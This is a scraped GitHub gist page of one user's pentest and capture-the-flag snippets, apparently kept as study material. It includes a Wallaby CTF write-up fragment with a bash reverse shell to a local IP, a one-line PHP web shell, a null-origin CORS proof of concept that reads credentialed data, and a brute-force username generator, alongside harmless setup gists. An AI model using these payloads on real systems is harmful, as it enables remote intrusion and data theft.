Skip to content

Instantly share code, notes, and snippets.

View avicoder's full-sized avatar
🖖
hmm hmm hmm hmm hmm

avicoder avicoder

🖖
hmm hmm hmm hmm hmm
193 followers · 4 following
View GitHub Profile
@avicoder
avicoder / Wallaby-CTF.md
Created January 7, 2017 13:04
Workaround

I'd faced issue while executing any command using .run command as it doesn't supporting white spaces and raising exception(for example ls index.html).

I figured up it by creating a .sh file with limited privledge session(www-data) in /html directory.

echo "#! bin/bash" > abc.sh
echo $'\n' >> abc.sh
echo "bash -i >& /dev/tcp/192.168.1.108/443 0>&1" >>abc.sh
chmod +x abc.sh

Now in hexchat exexcute:

@avicoder
avicoder / shell.php
Created January 9, 2017 06:59
<?php
system($_GET['cmd']);
?>
@avicoder
avicoder / linuxprivesc.py
Created January 17, 2017 16:15
#!/usr/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
@avicoder
avicoder / gist:61df8adeac2becdf2b53179521d250e4
Created March 27, 2017 07:43
Compile python source code on mac - Commands
curl -OL http://www.python.org/ftp/python/2.7.11/Python-2.7.11.tgz
tar xzvf Python-2.7.11.tgz
cd Python-2.7.11
./configure --prefix=/usr/local --enable-shared
make
make install
@avicoder
avicoder / namemash.py
Created August 7, 2017 05:28 — forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
#!/usr/bin/env python
import sys
if __name__ == "__main__":
if len(sys.argv) != 2:
print "usage: %s names.txt" % (sys.argv[0])
sys.exit(0)
for line in open(sys.argv[1]):
name = ''.join([c for c in line if c == " " or c.isalpha()])
@avicoder
avicoder / how-to-oscp-final.md
Created August 7, 2017 13:31 — forked from unfo/how-to-oscp-final.md

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@avicoder
avicoder / .pystartup
Created September 20, 2017 06:08 — forked from matterche/.pystartup
Enable Python REPL command history and tab completion
# Store this file in ~/.pystartup,
# set "export PYTHONSTARTUP=/home/user/.pystartup"
#
# Note that PYTHONSTARTUP does *not* expand "~", so you have to put in the
# full path to your home directory.
import atexit
import os
import readline
import rlcompleter
@avicoder
avicoder / Attacks.md
Last active December 10, 2017 13:34
Get an Idea about Each one
  • Arbitrary file access
  • Binary planting
  • Blind SQL Injection
  • Blind XPath Injection
  • Brute force attack
  • Buffer overflow attack
  • Cache Poisoning
  • Cash Overflow
  • Clickjacking
  • Command injection attacks
@avicoder
avicoder / Keybase.md
Last active December 26, 2017 12:49

Keybase proof

I hereby claim:

  • I am avicoder on github.
  • I am avicoder (https://keybase.io/avicoder) on keybase.
  • I have a public key ASA5E3ToP1__j0WJ0hVsfEKPF-t9pWa1Ka31uZpGM32rawo

To claim this, I am signing this object:

@avicoder
avicoder / Null-origin-code.html
Created April 24, 2018 07:27
<html>
<body>
<iframe src='data:text/html,<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://vuln-app.com/confidential", true);
xhr.withCredentials = true;
xhr.onload = function () {
if (xhr.readyState === xhr.DONE) {
console.log(xhr.response);
}